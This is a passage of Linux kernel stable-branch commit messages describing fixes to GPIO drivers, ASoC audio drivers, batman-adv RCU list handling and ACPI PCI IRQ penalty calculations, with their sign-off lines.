commit 091c531b upstream. Since commit 44a7185c ("of/platform: Add common method to populate default bus"), ARM64 platform devices are populated at the arch_initcall_sync level; as a result, the platform_driver_probe calls in both the iProc and NSP GPIO drivers fail with -ENODEV since by that time the platform device was not yet registered. Replace platform_driver_probe with platform_driver_register, that allow the device to be register later Fixes: 44a7185c ("of/platform: Add common method to populate default bus") Signed-off-by: Ray Jui <ray.jui@broadcom.com> Tested-by: Eric Anholt <eric@anholt.net> Signed-off-by: Linus Walleij <linus.walleij@linaro.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Chen-Yu Tsai authored
commit 85915b63 upstream. When sun4i_codec_create_card fails, we do not assign a proper error code to the return value. The return value would be 0 from the previous function call, or we would have bailed out sooner. This would confuse the driver core into thinking the device probe succeeded, when in fact it didn't, leaving various devres based resources lingering. Make the create_card function pass back a meaningful error code, and assign it to the return value. Fixes: 45fb6b6f ("ASoC: sunxi: add support for the on-chip codec on early Allwinner SoCs") Signed-off-by: Chen-Yu Tsai <wens@csie.org> Signed-off-by: Mark Brown <broonie@kernel.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Lukas Wunner authored
commit 6d13f62d upstream. skl_probe() releases a runtime pm ref unconditionally wheras skl_remove() acquires one only if the device is wakeup capable. Thus if the device is not wakeup capable, unloading and reloading the module will result in the refcount being decreased below 0. Fix it. Fixes: d8c2dab8 ("ASoC: Intel: Add Skylake HDA audio driver") Signed-off-by: Lukas Wunner <lukas@wunner.de> Signed-off-by: Mark Brown <broonie@kernel.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Masahiro Yamada authored
commit c7e9d398 upstream. Sylvain Lemieux reports the LPC32xx GPIO driver is broken since commit 762c2e46 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data"). Probably, gpio-etraxfs.c and gpio-davinci.c are broken too. Those drivers register multiple gpio_chip that are associated to a single OF node, and their own .of_xlate() checks if the passed gpio_chip is valid. Now, the problem is of_find_gpiochip_by_node() returns the first gpio_chip found to match the given node. So, .of_xlate() fails, except for the first GPIO bank. Reverting the commit could be a solution, but I do not want to go back to the mess of struct gg_data. Another solution here is to take the match by a node pointer and the success of .of_xlate(). It is a bit clumsy to call .of_xlate twice; for gpio_chip matching and for really getting the gpio_desc index. Perhaps, our long-term goal might be to convert the drivers to single chip registration, but this commit will solve the problem until then. Fixes: 762c2e46 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data") Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com> Reported-by: Sylvain Lemieux <slemieux.tyco@gmail.com> Tested-by: David Lechner <david@lechnology.com> Signed-off-by: Linus Walleij <linus.walleij@linaro.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Jason Gunthorpe authored
commit 812d4788 upstream. This fixes the irq allocation in this driver to not print: irq: Cannot allocate irq_descs @ IRQ34, assuming pre-allocated irq: Cannot allocate irq_descs @ IRQ66, assuming pre-allocated Which happens because the driver already called irq_alloc_descs() and so the change to use irq_domain_add_simple resulted in calling irq_alloc_descs() twice. Modernize the irq allocation in this driver to use the irq_domain_add_linear flow directly and eliminate the use of irq_domain_add_simple/legacy Fixes: ce931f57 ("gpio/mvebu: convert to use irq_domain_add_simple()") Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com> Signed-off-by: Linus Walleij <linus.walleij@linaro.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Sven Eckelmann authored
commit 9ca488dd upstream. The batadv_hard_iface::neigh_list is accessed via rcu based primitives. Thus all operations done on it have to fulfill the requirements by RCU. So using non-RCU mechanisms like hlist_add_head is not allowed because it misses the barriers required to protect concurrent readers when accessing the data behind the pointer. Fixes: cef63419 ("batman-adv: add list of unique single hop neighbors per hard-interface") Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com> Acked-by: Linus Lüssing <linus.luessing@c0d3.blue> Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Sinan Kaya authored
commit 98756f53 upstream. Commit 103544d8 ("ACPI,PCI,IRQ: reduce resource requirements") replaced the addition of PIRQ_PENALTY_PCI_USING in acpi_pci_link_allocate() with an addition in acpi_irq_pci_sharing_penalty(), but f7eca374 ("ACPI,PCI,IRQ: separate ISA penalty calculation") removed the use of acpi_irq_pci_sharing_penalty() for ISA IRQs. Therefore, PIRQ_PENALTY_PCI_USING is missing from ISA IRQs used by interrupt links. Include that penalty by adding it in the acpi_pci_link_allocate() path. Fixes: f7eca374 (ACPI,PCI,IRQ: separate ISA penalty calculation) Signed-off-by: Sinan Kaya <okaya@codeaurora.org> Acked-by: Bjorn Helgaas <bhelgaas@google.com> Tested-by: Jonathan Liu <net147@gmail.com> Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Sinan Kaya authored
commit f1caa61d upstream. Ondrej reported that IRQs stopped working in v4.7 on several platforms. A typical scenario, from Ondrej's VT82C694X/694X, is: ACPI: Using PIC for interrupt routing ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) ACPI: No IRQ available for PCI Interrupt Link [LNKA] 8139too 0000:00:0f.0: PCI INT A: no GSI We're using PIC routing, so acpi_irq_balance == 0, and LNKA is already active at IRQ 11. In that case, acpi_pci_link_allocate() only tries to use the active IRQ (IRQ 11) which also happens to be the SCI. We should penalize the SCI by PIRQ_PENALTY_PCI_USING, but irq_get_trigger_type(11) returns something other than IRQ_TYPE_LEVEL_LOW, so we penalize it by PIRQ_PENALTY_ISA_ALWAYS instead, which makes acpi_pci_link_allocate() assume the IRQ isn't available and give up. Add acpi_penalize_sci_irq() so platforms can tell us the SCI IRQ, trigger, and polarity directly and we don't have to depend on irq_get_trigger_type(). Fixes: 103544d8 (ACPI,PCI,IRQ: reduce resource requirements) Link: http://lkml.kernel.org/r/201609251512.05657.linux@rainbow-software.orgReported-by: Ondrej Zary <linux@rainbow-software.org> Acked-by: Bjorn Helgaas <bhelgaas@google.com> Signed-off-by: Sinan Kaya <okaya@codeaurora.org> Tested-by: Jonathan Liu <net147@gmail.com> Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Sinan Kaya authored
commit eeaed4bb upstream. We do not want to store the SCI penalty in the acpi_isa_irq_penalty[] table because acpi_isa_irq_penalty[] only holds ISA IRQ penalties and there's no guarantee that the SCI is an ISA IRQ. We add in the SCI penalty as a special case in acpi_irq_get_penalty(). But if we called acpi_penalize_isa_irq() or acpi_irq_penalty_update() for an SCI that happened to be an ISA IRQ, they stored the SCI penalty (part of the acpi_irq_get_penalty() return value) in acpi_isa_irq_penalty[]. Subsequent calls to acpi_irq_get_penalty() returned a penalty that included *two* SCI penalties. Fixes: 103544d8 (ACPI,PCI,IRQ: reduce resource requirements) Signed-off-by: Sinan Kaya <okaya@codeaurora.org> Acked-by: Bjorn Helgaas <bhelgaas@google.com> Tested-by: Jonathan Liu <net147@gmail.com> Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-